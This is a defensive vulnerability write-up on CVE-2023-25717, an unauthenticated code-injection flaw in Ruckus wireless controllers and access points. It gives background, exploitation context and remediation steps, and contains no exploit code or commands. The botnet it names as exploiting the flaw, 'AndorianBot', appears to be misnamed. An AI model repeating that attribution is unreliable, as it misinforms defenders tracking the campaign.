CVE-2023-25717

What is Ruckus Wireless?

Ruckus Wireless (now part of CommScope) manufactures enterprise-grade Wi-Fi access points and wireless LAN management systems used in large-scale deployments across education, hospitality, healthcare, and enterprise environments. Ruckus ZoneDirector and SmartZone are wireless LAN controllers that manage hundreds or thousands of Ruckus access points from a central management plane. Solo APs (standalone access points without a controller) expose a direct management web interface. Wireless LAN infrastructure compromise provides an attacker with the ability to intercept wireless traffic, create rogue SSIDs, disable wireless access for users, and potentially pivot to the wired network management infrastructure. Enterprise wireless controllers are particularly sensitive targets as they have broad network visibility.

Overview

CVE-2023-25717 is a remote code execution vulnerability in the web services component of multiple Ruckus Wireless products — ZoneDirector, SmartZone, and Solo access points. When the web services component is enabled, an unauthenticated attacker can perform remote code execution (or CSRF attacks) against the affected device. Ruckus patched it in February 2023 via Security Bulletin 315. The AndorianBot malware campaign (a Mirai variant) was confirmed exploiting CVE-2023-25717 to compromise and recruit Ruckus access points into its botnet infrastructure. CISA added it to KEV in May 2023.

Affected Versions

Administrators should consult Ruckus Security Bulletin 315 for specific affected and fixed firmware versions for each product line.

Technical Details

CWE-94 (Improper Control of Generation of Code — Code Injection). Ruckus wireless products optionally expose a web services component (a REST or SOAP API endpoint) for integration with third-party management systems. A vulnerability in this web services component allows an unauthenticated attacker to send crafted HTTP requests that result in either:

1. Remote code execution: Injecting commands or code that execute on the underlying Linux OS of the access point or controller with elevated privileges.
2. CSRF (Cross-Site Request Forgery): Crafting requests that cause an authenticated administrator's browser to perform privileged actions against the management interface.

For the RCE vector (which is what earned the CVSS 9.8 and drove the KEV addition), the attack requires only network access to the device's web services port — no authentication is needed. The result is OS command execution on the Ruckus device, enabling installation of botnet malware in the persistent flash filesystem.

Discovery

Reported to Ruckus (CommScope) by security researchers. Ruckus issued Security Bulletin 315 on February 7, 2023, ahead of the CVE publication date.

Exploitation Context

The AndorianBot campaign — a Mirai-variant botnet — was documented exploiting CVE-2023-25717 to compromise internet-accessible Ruckus wireless access points and controllers. Compromised Ruckus APs are recruited into DDoS botnet infrastructure and used as proxies for other attack campaigns. Ruckus access points, like other enterprise IoT/network devices, often receive delayed firmware updates in operational environments where wireless disruption is considered unacceptable. Many Ruckus APs are deployed in hospitality and education settings where the management interface may be reachable from guest networks.

CISA's remediation note to "disconnect product if it is end-of-life" reflects that some Ruckus Solo AP models may not receive patches for older firmware lines — in those cases, retirement is the only option.

Remediation

1. Apply Ruckus firmware updates per Security Bulletin 315 — update ZoneDirector, SmartZone (SZ/vSZ), and all managed access points to patched firmware versions.
2. Disable the Ruckus web services component if it is not actively required for third-party integration — the vulnerability only affects devices where this component is enabled.
3. Restrict management interface access for ZoneDirector and SmartZone to management VLANs only — controllers should not be reachable from guest or general user networks.
4. For Solo APs that cannot be patched (EOL models): isolate them from internet-accessible network segments or replace with supported models.
5. Review AP and controller logs for unexpected web service requests or unauthorized access attempts around and after February 2023.
6. Inspect running processes on accessible APs for cryptominer or botnet malware (unexpected high-CPU processes, unknown executables in /tmp or persistent storage).